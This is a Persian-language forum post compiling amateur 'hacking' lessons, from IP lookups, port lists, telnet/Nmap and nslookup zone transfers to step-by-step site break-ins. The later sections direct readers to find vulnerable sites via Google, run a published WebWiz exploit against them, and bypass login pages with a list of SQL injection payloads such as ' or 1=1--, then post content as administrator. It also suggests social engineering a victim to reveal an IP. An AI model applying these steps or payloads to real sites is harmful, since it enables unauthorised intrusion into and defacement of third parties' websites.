آموزش كاملا كامل هك براي افراد فوق العاده مبتدي و افراد كاملا حرفه اي!!!!!!!!!
هک - قسمت اول
درس اول
هک چی بيده و هکر کی بيده؟هکر به کسی که از رايانه اطلاعاتی دارد و می تواند بدون اجازه وارد سيستم های کامپيوتری شود
چه چيزايي رو ياد بگيريم؟ اول از همه تی سی پی/آی پی دوم ويندوز 2000 و لينوکس
برای زنگ های تفريح بين درس ها من از مسايل هک غير مربوط استفاده می کنم مثلا آموزش داشتن اينترنت رايگان و اين جور مسايل
از تمامی عزيزانی که در زمينه ی هک يه جورايي (مثل من)هستن درخواست می شه به من کمک کنن حتی اگر اولين بارشونه که می هوان يه نفر رو هک کنن من به اونا هم کمک می کنم
درس دوم
اواين چيزی که يه هکر بايد بلد باشه پيدا کردنه آی پی طرف مقابله(برای کلاينت)پيدا کردن آی پی می تونه تو چت باشه و يا از طريق های ديگر ولی من چند نوع پيدا کردن آی پی رو به شما می گم حتما می پرسين آ پی چيه؟آی پی به آدرس هايي گفته می شود که در اينترنت کاربرد دارند مثلا داده ها در اينترنت از طريق همين آی پی ها منتقل می شه يعنی آی پی يه نوع آدرس اينترنتی است که در هر دفعه اتصال به اينترنت تغيير می کند و يه عددی مثل 125.124.23.26 اولين راهی که برای پيدا کردن آی پی به ذهن يه هکر در چت می افته استفاده از دستور زيره يعنی
netstat
خب وقتی اين دستور را در کامند پرومنت تايپ کنيد در صورتی که اينترنت قطع باشد نتايج زير حاصل می شود و اگر هم وصل باشد آی پی ها نمايش داده می شود
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\>netstat
Active Connections Proto Local Address Foreign Address State
در شکل اينترنت من قطع بوده است و می بينيد که هيچ آدرسی نمايش داده نمی شود ولی اگر اينترنت وصل بود و من هم در حال چت با فردی بودم آی پی او نمايش داده می شه ولی الان خالی هست خب پيدا کردن آی پی در چت رو گفتم اما چه جوری آی پی يه سايت رو پيدا کنيم برای اطن کار دو روش وجود داره اولی اينه که به سايت پينگ کنيم و دومی هم هوايز کردن سايت است که روش هر دو اين زير هست ولی برای تمامی سايت ها هوايز کردن بهتره چون نتيجه ی بهتری را در بر دارد
ping site name
روش بالا برای هر سايتی قابل استفاده است مثلا به مثال زير توجه کنيد
ping persianblog.com
دقت کنيد که ما نام سايت را وارد می کنيم و با استفاده از اين روش به نتايج زير رسيديم
pinging persianblog.com [xxx.yyy.zzz.nnn] with 32 bytes of data:
Reply from xxx.yyy.zzz.nnn bytes=32 time=821ms TTL =111
Reply from xxx.yyy.zzz.nnn: bytes=32 time=821ms TTL =111
Reply from xxx.yyy.zzz.nnn: bytes=32 time=822ms TTL =111
Reply from xxx.yyy.zzz.nnn: bytes=32 time=811ms TTL =111
Ping statistics for 63.148.227.65:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 811ms, Maximum = 822ms, Average = 818ms
می باشدxxx.yyy.zzz.nnnملاحظه می کنيد که آی پی پرشين بلاگ
برای روش دوم هم به مثال زير توجه کنيد
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
بعد از زدن اينتر اطلاعات زير نمايش داده می شود
whois -h magic xxx.yyy.zzz.nnn
sazin.com resolves toxxx.yyy.zzz.nnn
Trying whois -h whois.arin.net xxx.yyy.zzz.nnn
Qwest Communications NET-QWEST-BLKS-2 (NET-63-144-0-0-1)
63.144.0.0 - 63.151.255.255
Neutron Digital Media Corp. QWST-63-148-224 (NET-63-148-224-0-1)
63.148.224.0 - 63.148.231.255
# ARIN Whois database, last updated 2002-09-04 19:05
# Enter ? for additional hints on searching ARIN's Whois database.
در دو سطر اول آی پی طرف مقابل(سايت)مشخص می شود
سايت های معروف اين کار
whois.internic.net (The InterNIC)
whois.onlinenic.com (The OnLineNIC)
whois.arin.net (American Registry for Internet Numbers)
whois.ripe.net (European IP Address Allocations)
whois.apnic.net (European IP Address Allocations)
whois.nic.mil (US Military)
whois.nic.gov (US Government)
ولی همون اولی که مثال زدم از همه بهتره می گی نه نگاه کن
بعد اين می رسيم به پيدا کردن آی پی کلاينت برای اين کار چند روش وجود دارد که شما می توانيد يکی از اين روش ها را برگزينيد البته با ساب سون نيز می شود اما قبلا بايد او را هک
کرده باشيد جالا مراحل زير را دنبال کنين تا آخر
اولين راه فرستادن فايله که اول بايد از مهندسی اجتماعی استفاده کنيد تا به شما اعتماد کنه و گر نه که قيد اينو بزنين
در کامند پرومنت است که در بالا گفتم Netstat -n راه دوم نوشتن دستور
اين دستور بيشتر در چت کاربرد دارد
راه سوم هم زدن مخه يعنی سريش بازی در آوردن
و راه حل آخر هم که برای مسخره بازی نوشتم پرسيدن آی پی از طرفه(چقدر بامزه)مسخره بود نه
اگه کسی سوالی داره بگه من منتظرم
هک - قسمت دوم
درس سوم
قسمت قبلی رو که حتما خوندین !
بعد از اون چیزایی که در قسمت اول گفتم می رسيم به مشخص کردن پورت های باز بر روی سرور و يا کلاينت
برای اين کار چند روش وجود دارد ابتدا برای سايت ما می توانيم از دو روش معمول و معقولانه استفاده کنيم اين دو روش که در زير آمده است
برای اين است که ما ببينيم که پورت هايي که ما می خواهيم روی آن سرور باز است يا نه ؟ دستورش هم اين جوری بيدهtelnetاولين روش استفاده از
telnet site name port number
لابد می پرسيد که ديگه پورت چيه؟پورت به طور کلی به درگاه های ورودی و خروجی کامپيوتر گفته می شود که همه منطقی هستند و وجود خارجی ندارند در هر سيستم 65535 عددد پورت تی سی پی و 65535 عدد پورت يو دی پی وجود دارد که همه منطقی هستند(کامپيوتر چقدر منطقی هست)ليست پورت ها اين زير هست بخونينش براتون مفيده (هر کی بتونه همشونو حفظ کنه یه جایزه پیش من داره)
Ports TCP/UDP Service or Application
------- ------------ ---------- -- ----------------
7 tcp echo
11 tcp systat
19 tcp chargen
21 tcp ftp-data
22 tcp ssh
23 tcp telnet
25 tcp smtp
42 tcp nameserver
43 tcp whois
49 udp tacacs
53 udp dns-lookup
53 tcp dns-zone
66 tcp oracle-sqlnet
69 udp tftp
79 tcp finger
80 tcp http
81 tcp alternative for http
88 tcp kerberos or alternative for http
109 tcp pop2
110 tcp pop3
111 tcp sunrpc
118 tcp sqlserv
119 tcp nntp
135 tcp ntrpc-or-dec
139 tcp netbios
143 tcp imap
161 udp snmp
162 udp snmp-trap
179 tcp bgp
256 tcp snmp-checkpoint
389 tcp ldap
396 tcp netware-ip
407 tcp timbuktu
443 tcp https/ssl
445 tcp ms-smb-alternate
445 udp ms-smb-alternate
500 udp ipsec-internet-key-exchange (ike)
513 tcp rlogin
513 udp rwho
514 tcp rshell
514 udp syslog
515 tcp printer
515 udp printer
520 udp router
524 tcp netware-ncp
799 tcp remotely possible
1080 tcp socks
1313 tcp bmc-patrol-db
1352 tcp notes
1433 tcp ms-sql
1494 tcp citrix
1498 tcp sybase-sql-anywhere
1524 tcp ingres-lock
1525 tcp oracle-srv
1527 tcp oracle-tli
1723 tcp pptp
1745 tcp winsock-proxy
2000 tcp remotely-anywhere
2001 tcp cisco-mgmt
2049 tcp nfs
2301 tcp compaq-web
2447 tcp openview
2998 tcp realsecure
3268 tcp ms-active-dir-global-catalog
3268 udp ms-active-dir-global-catalog
3300 tcp bmc-patrol-agent
3306 tcp mysql
3351 tcp ssql
3389 tcp ms-termserv
4001 tcp cisco-mgmt
4045 tcp nfs-lockd
5631 tcp pcanywhere
5800 tcp vnc
6000 tcp xwindows
6001 tcp cisco-mgmt
6549 tcp apc
6667 tcp irc
8000 tcp web
8001 tcp web
8002 tcp web
8080 tcp web
9001 tcp cisco-xremote
12345 tcp netbus
26000 tcp quake
31337 udp backorifice
32771 tcp rpc-solaris
32780 udp snmp-solaris
43188 tcp reachout
65301 tcp pcanywhere-def
اگر بعد از خوندن قاطی کردین اشکالی نداره همه این طوری میشن !(حال همتونو می دونم) اما زیاد ناراحت یاد گیریه اینا هم نباشید . فعلا پورت های مهم برای ما پورت های 7، 15، 21، 23، 25، 79،80،110و119 هستند .
حالا دانلود کنا بیان جلو ! خب حالا می رسيم به مبحث تعيين پورت باز که يه نمونه رو گفتم حالا با استفاده از نرم افزار می خواهيم اين کار را بکنيم
Nmap
هر کی میخواد آدرس سایتشو بدونه دستشو ببره بالا
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
درس چهارم
خب حالا ما اين اطلاعات رو پيدا کرديم با اينا چی کار کنيم؟
خب عزيزان(تحويلم بگيرين)بعد از استفاده از اون کاری که در درس قبل گفتم می رسيم به چگونگی استفاده از اين اطلاعات خب يه دور اين زيريا رو مرور کنين تا بعدش بهتون بگم :
در اين جور اطلاعات می توانيد قسمت های زير را بيابيد
نام شرکت
نام حوزه
آدرس آی پی
و يه سری اطلاعاتی که به درد ما نمی خوره(اين اطلاعات رو سايت می ده برين ببينين)در اينجا يه سری اطلاعات در مورد نام و اين جور مسايل داده می شه که زياد مورد استفاده قرار نمی گيره
در واقع مبحثی که من بالا مطرح کردم مبحث تکميلی درس قبل بود می دونين ديگه اما درس جديد از اينجا شروع می شه نه از اون جا حالا اينا رو هم بخونين ضرر نداره
اگه شما از اينترنيک استفاده کرديد که سط آخر نوشته دی اِن اِس و جلوش آدرس آی پی رو نوشته شما با استفاده از اون می تونين به ادامه ی کار بپردازيد اما چون اين سايت از همه راحت تر و در عين حال کامل تر بود براتون می گم خب حالا کار های زير رو روش انجام بدين و نتيجه رو ببينين
در خط دی اِن اِس سرور نام سرور ها نوشته شده است مثلا سرور1،سرور2 و ....حالا شما با استفاده از دستورات زير می تونين يه اطلاعات ديگری به دست بيارين حالا شروع می کنيم
کامنت پرومنت را باز کنيد و دستورات زير را درونش بنوسيد (یادتون نره خوش خط)
c:\>nslookup
با تايپ دستور زير نتايج زير حاصل می شود خودتون ببينيد
*** Can't find server name for address 192.168.20.3: Non-exi...
*** Can't find server name for address 192.168.20.1: Non-exi...
*** Default servers are not available
Default Server: UnKnown
Address: xxx.yyy.zzz.nnn
<
دقت کنيد که علامت > را حتما داشته باشه بعد از اين کار هم دستو زير را تايپ کنين تا يه چيز جديد ياد بگيرين
server dns_server <
شما به جای دی اِن اِس_سرور نام دی اِن اِس سروری که در کار قبل ياد گرفتين و حتما انجام دادين را بزارين بعد از زدن اينتر نتايج زير حاصل می شود
Default Server: site name.com
Address: xxx.yyy.zzz.nnn
در جاهايي که سايت نيم نوشتم چون ممکنه تغيير بکنه برای همين همه رو يکی نوشتم
بعدش اينو بنويسين اگه خطا گرفت دوباره دستور را تايپ کنين و يا از يکی ديگه سروراستفاده کنين
set type=any <
حالا بستگی داره خطا بگيره يا نه اگه گرفت از بقيه اينا استفاده کنين اما اگه نگرفت اينا رو ادامه بدين
ls -d site_name <
و درآخر هم اينا رو گير ميارين حال بماند به چه کار ميان
[s1.site name.com]
site name.com. SOA s1.site name.com admin.site name.com.
(2002070412 3600 600 86400 3600)
site name.com. A xxx.yyy.zzz.nnn
site name.com. NS s1.site name.com
site name.com. NS s2.site name.com
site name.com. MX 10 mail.site name.com
site name.com. MX 15 site name.com
ftp CNAME xxx.yyy.zzz.nnn
www CNAME site name.com
site name.com. SOA s1.site name.com admin.site name.com.
(2002070412 3600 600 86400 3600)
<
درس پنجم
در درس بعدی (که خیلی توپه) در مورد کارکرد هر پورت و مسائل مربوط به ياهو مسنجر و کارت اينترنت رايگان (که البته هیچ کدوم از شما بهش علاقه ندارین)و اين جور مسائل توضيح می دم فقط يه نمه وقت می بره . اگه صبر کنين دارم يه ویژه نامه درباره شبکه و امنیت آن می نویسم که هر چی راجع به هک و کرک هم لازمه در بر می گیره . شما هم اگر بخواید می تونید کمکم کنید و همینطور از نظراتتون با اطلاعم کنید .
تا درس بعد همتون رو به خدا می سپارم . . . یا حق
ادغام شد.
Harry Potter
هک سایت با استفاده از باگ WebWiz
همونطوري که ميدونيد اخيرا يک باگ در WebWiz کشف شده.اين باگ توسط تيم ايراني با نام kapda کشف شده و اکسپلوييت اون هم توسط يکي از اعضاي اين گروه بانام devil_box نوشته شده.نسخه هاي آسيب پذير توسط اين اکسپلوييت :
webwiz site news access2000 : vesion 3.06 and prior versions
webwiz journal access2000 : version 1.0
webwiz weekly poll access2000 : version 3.06 and prior versions
database login access2000 : version 1.71 and prior versions
webwiz site news access97 : version 3.06 and prior versions
webwiz journal access97 : version 1.0
webwiz weekly poll access97 : version 3.06 and prior versions
database login access97 : version 1.71 and prior versions
ما براي نفوذ به سايتها بايد اين صفحه رو در اونا پيدا کنيم(سايتهايي که از WebWiz استفاده ميکنن)
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
[product]/check_user.asp
که با استفاده از گوگل به راحت ميتونيد با يه سرچ ساده اينکارو بکنيد.
خب حالا بايد اکسپلوييت اين باگ رو از اینجا دريافت کنيد.
فايل htm رو توسط notepad بازش کنيد و در اون به دنبال اين عبارت بگرديد :
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
[product]/check_user.asp
و به جاش آدرس صفحه مورد نظرتونو وارد کنيد.بعد save کنيد و با مرورگرتون باز کنيد صفحه htm رو.
حالا روي دکمه Submit کليک کنيد.اگه سايت patch شده باشه با يه error مواجه ميشيد.
خب ! کار نفوذ تموم شده.بقيش احتياج به توضيح نداره و با کمي ور ( var ) رفتن ميتونيد يه بلايي سر سايت بياريد.
از اين به بعد آموزش هايي اين وبلاگ رو ميخوام حرفه اي ترش کنم.
موفق باشيـــــــــــــــــــــ ـــــد :blush:
هک سایت توسط SQL Injection
با سلام .امروز با استفاده از روشی ساده میخوام طرز هک کردن سایت رو بدم.فقط این نوع هک از نوع کیلوییه ! یعنی اینکه این جوریه که میرید یه عبارتو سرچ میکنید و بعد سایتهای که پیدا میشند رو میتونید هک کنید...
خب اول از همه شما باید برید اینو تو گوگل سرچ کنید : " login.asp "بعدش واستون کلی لینک میاره که شما باید سراغ لینکهایی برید که آدرسشون به این صورته :
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
.خلاصه آخرش باید صفحه لوگین باشه.یه پیشنهادیم که بهتون میکنم اونم اینکه بیخیال صفحات اول شید...چون این لینکای این صفحات اکثراْ patch شدند.حالا یکی از اون لینکارو باز کنید.توش که برید میبینید که یه قسمت داره که ازتون Username و Password میخواد.حالا به جای یوزر بزنید : admin و به جای پسورد یکی از چیزای زیر رو بزنید :
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
(چون انتخاب متن رو قفل کردم و شما نمیتونید کپی کنید کدهای بالا رو من این کدها رو توی قسمت نظرات همین پست نوشتم که میتونید از اونجا برداریدشون)
یه چیزی اونم اینکه همیشه نباید اینجوری بزنید بعضی وقتا توی همه یوزر و هم پسورد از یکی از حرفای بالا استفاده کنید.همون طوری که دیدید این یه روش خیلی سادس فقط به این هم توجه داشته باشید که اگه یه بار کارای بالا رو انجام دادید و لوگین نشدید بیخیا اینجا نشید.همون طوری که گفتم یه روش ابتکاریه.امتحان کنید حتما جواب میده ( اگه پچ نشده باشه )
یه چیز دیگه اونم اینکه بعضیا میان میپورسن : حالا فرضاْ ما لوگین شدیم.بعدش باید چیکار کنیم ؟ در جواب باید بگم که در این نوع هک شما بعد اینکه هک کردید باید برید دنبال گزینه هایی مثل : " درج خبر جدید " یا "Send New Post "و بعدش هم که اینجا رفتید دیگه کاملا مشخصه!یه جا باید متن خبر رو بنویسید و یه جا هم داره که تاریخ خبر و یه جا هم عنوان خبر و .... که مشخصه.
خب اینم تموم شد.تا آموزش بعدی خداحافظ :blush:
توضيح مختصری در مورد انواع پروتکل ها
پروتکل tcp/ip:اين پروتکل يکی از مهمترين و جزوء پر امنيت ترين پروتکل ها است و برا اساس روش تبديل داده ها به ديتاگرام است يعنی داده ها را به بسته های کوچکی تبديل کرده و آن را به صورت مستقل به مقصد می رساند و هر بسته حاوی آدرس فرستنده و گيرنده است.اين پروتکل بيشترين استفاده را در هک دارد
پروتکل http: اين پروتکل نيز جزء مهمترين پروتکل های ارتباطی است اين پروتکل که بر روی پورت ۸۰ سوار است قابليت stateless دارد و بدون هيچ تماسی بين کامپيوتر ميزبان و سرور است
پروتکل ftp:اين پروتکل برای فرستادن و گرفتن فايل به کار می رود اين پروتکل بر روی پورت ۲۱ سوار بوده و سعی می کند تا فايل ها را به صورت يک جا به مقصد ارسال کند
پروتکل usenet : اين پروتکل بيشتر برای سازمان های خصوصی و ارتباط ها جمعی بين گرو ههای خبری است
پروتکل gopher : اين پروتکل از نوع قديمی پروتکل http است و در اين نوع پروتکل کامپيوتر ميزبان می تواند به کامپيوتر سرور ارتباط بر قرار کرده و تبادل اطلاعات کند
پروتکل telnet: اين نوع پروتکل برای ورود به کامپيوتر های ديگر است اين پروتکل بر روی پورت ۲۳ سوار بوده و قابليت تعويض را نيز دارد.
